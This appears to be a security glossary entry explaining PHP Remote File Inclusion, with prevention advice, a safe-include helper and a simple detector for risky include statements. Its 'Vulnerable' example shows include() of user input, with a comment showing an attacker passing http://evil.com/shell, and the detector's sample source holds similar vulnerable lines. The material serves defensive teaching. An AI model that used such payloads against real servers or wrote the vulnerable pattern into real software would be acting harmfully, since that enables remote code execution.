
Remote File Inclusion (RFI)

Tags: security, CWE-98, OWASP A3:2021, CVSS 9.8, PHP 5.0+, Intermediate

Also Known As

RFI, Remote File Inclusion, remote include

TL;DR

An attacker tricks include() or require() into loading a PHP file from an attacker-controlled remote URL, achieving code execution.

Explanation

RFI requires two things: allow_url_include=On (disabled by default since PHP 5.2) and an include path that the user controls. The attacker supplies a URL pointing to a remote PHP file they control; the server fetches and executes it with the privileges of the web server process. Even with allow_url_include=Off, local file inclusion (LFI) can escalate to code execution via log poisoning, PHAR injection, or /proc/self/environ.

Prevention: always disable allow_url_include, never pass user input to include/require, use a whitelist of permitted file identifiers, and validate paths with realpath() against an allowed prefix.

Common Misconception

allow_url_include = Off fully prevents file inclusion attacks. It prevents remote URL inclusion but not local file inclusion (LFI) — and LFI can itself lead to RCE via log poisoning or PHP session file inclusion.

Why It Matters

Fetching a remote PHP file via include() gives the attacker full code execution; even local file inclusion can expose source code or log-poisoning chains.

Common Mistakes

  • Using user input directly in include(), require(), or include_once() paths.
  • Leaving allow_url_include = On in php.ini — this enables RFI entirely.
  • Path traversal filtering that misses double-encoded sequences like ..%2F.
  • Using a whitelist of partial filenames without verifying the full resolved path via realpath().

Code Examples

✗ Vulnerable
include($_GET['page'] . '.php'); // attacker passes http://evil.com/shell
✓ Fixed
$allowed = ['home', 'about', 'contact'];
$requested = isset($_GET['page']) ? $_GET['page'] : 'home';
// strict in_array(): only an exact string match from the whitelist is accepted
$page = in_array($requested, $allowed, true) ? $requested : 'home';
include __DIR__ . '/pages/' . $page . '.php';
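The whitelist above accepts only a fixed set of names. The Explanation also calls for validating the resolved path with realpath() against an allowed prefix; the following is an added example (not code from the CodeClarityLab glossary) showing that pattern together with a runtime check of allow_url_include. It assumes PHP 7.1 or later, a pages/ directory beside the script, and the function names safe_include_path() and inclusion_config_findings() are invented for this example.

```php
<?php
// Added example, not from the glossary page. Resolves a user-supplied page
// identifier to a file under a fixed directory and refuses anything else.
// safe_include_path(), inclusion_config_findings() and the pages/ directory
// are assumptions made for this example.

declare(strict_types=1);

/**
 * Return the absolute path of an includable page, or null if the request
 * must be refused. Only the resolved path is ever passed to include.
 */
function safe_include_path(string $baseDir, ?string $page): ?string
{
    // Accept only a plain identifier: no slashes, dots, NUL bytes, URL
    // schemes or stream wrappers (http://, php://, phar://, data:).
    if ($page === null || !preg_match('/\A[a-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory missing: fail closed
    }

    // realpath() collapses ../ and follows symlinks; false means no such file.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $page . '.php');
    if ($candidate === false) {
        return null;
    }

    // Even with a clean identifier, a symlink inside pages/ could point
    // outside it, so the resolved path must still start with the base prefix.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $candidate;
}

/**
 * Runtime configuration check for a hardened server. Returns a list of
 * findings; an empty list means the include-related settings are acceptable.
 * allow_url_include is PHP_INI_SYSTEM, so it can only be read here, not changed.
 */
function inclusion_config_findings(): array
{
    $findings = [];
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_include is On: include()/require() can load remote URLs';
    }
    // allow_url_include only works when allow_url_fopen is also On; report it
    // as context rather than as a defect, since many applications need it.
    if (filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'note: allow_url_fopen is On (required for allow_url_include to take effect)';
    }
    return $findings;
}

// Usage: the base directory is fixed in code; only the identifier comes
// from the request, and only the resolved path reaches include.
foreach (inclusion_config_findings() as $finding) {
    error_log('[inclusion-config] ' . $finding);
}

$path = safe_include_path(__DIR__ . '/pages', $_GET['page'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

The identifier regex alone already blocks URLs, wrappers and traversal, so the realpath() prefix comparison is the second layer: it catches the case where a file under pages/ is itself a symlink to somewhere else, which is exactly the failure the whitelist-of-partial-names mistake above leaves open.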

Added 15 Mar 2026
Edited 22 Mar 2026
Dev Intel: Tools & Severity

Severity: Critical. Fix effort: Low.

Quick Fix: Set allow_url_include=Off in php.ini (it is off by default since PHP 5.2). Remote file inclusion is only possible when this setting is enabled, so disabling it prevents this entire class of attack (remote inclusion).

Applies To: PHP 5.0+, web

Detection Hints: allow_url_include=On in php.ini; include or require with a user-controlled URL; including remote scripts.
Auto-detectable: Yes (semgrep, lynis, phpstan)

AI Agent: Confidence: High. False Positives: Low. Manual fix. Fix: High. Context: Function. Tests: Update.

Related CWEs: CWE-98, CWE-829
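As an added example of the detection hints above (not from the glossary page and not the logic of semgrep, lynis or phpstan), a small PHP script that flags include/require statements whose path contains request data and checks php.ini text for allow_url_include=On. The sample source and ini text are constructed, and the function names find_risky_includes() and ini_enables_url_include() are invented for this example.

```php
<?php
// Added example, not from the glossary page. A line-based static check for
// the two detection hints: include-family statements that use request data,
// and allow_url_include=On in php.ini. Function names are assumptions.

declare(strict_types=1);

/**
 * Scan PHP source text and return one finding per risky include/require line.
 * Heuristic: an include-family keyword on the same statement as a request
 * superglobal. Data that flows through an intermediate variable is not
 * tracked; that is what a real taint analyser adds on top of this.
 */
function find_risky_includes(string $source): array
{
    $findings = [];
    $pattern = '/\b(include|include_once|require|require_once)\b[^;]*'
             . '\$_(GET|POST|REQUEST|COOKIE|SERVER)\b/';
    foreach (explode("\n", $source) as $i => $line) {
        if (preg_match($pattern, $line)) {
            $findings[] = ['line' => $i + 1, 'code' => trim($line)];
        }
    }
    return $findings;
}

/**
 * Return true if php.ini text enables allow_url_include.
 * parse_ini_string() understands On/Off/1/0 and skips ; comments; if it
 * cannot parse the text, fall back to a plain line match.
 */
function ini_enables_url_include(string $iniText): bool
{
    $settings = @parse_ini_string($iniText, false, INI_SCANNER_TYPED);
    if (is_array($settings)) {
        return (bool) ($settings['allow_url_include'] ?? false);
    }
    return (bool) preg_match('/^\s*allow_url_include\s*=\s*(on|1|true|yes)\s*$/im', $iniText);
}

// Constructed sample source: lines 3 and 4 should be flagged, line 5 should
// not (the identifier comes from a local variable, a known limitation).
$sampleSource = <<<'PHP'
<?php
include 'header.php';
include($_GET['page'] . '.php');
require_once __DIR__ . '/lib/' . $_REQUEST['mod'] . '.php';
include __DIR__ . '/pages/' . $page . '.php';
PHP;

// Constructed php.ini fragments: one hardened, one enabling remote includes.
$hardenedIni = "; hardened\nallow_url_fopen = On\nallow_url_include = Off\n";
$weakIni     = "allow_url_fopen = On\nallow_url_include = On\n";

foreach (find_risky_includes($sampleSource) as $f) {
    printf("risky include at line %d: %s\n", $f['line'], $f['code']);
}
printf("hardened ini enables allow_url_include: %s\n", ini_enables_url_include($hardenedIni) ? 'yes' : 'no');
printf("weak ini enables allow_url_include: %s\n", ini_enables_url_include($weakIni) ? 'yes' : 'no');
```

Run against the constructed input this reports the two direct-superglobal includes and marks only the second ini fragment as enabling remote includes; the unflagged line 5 is the reason the page lists semgrep and phpstan, which follow data through variables rather than matching a single line.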
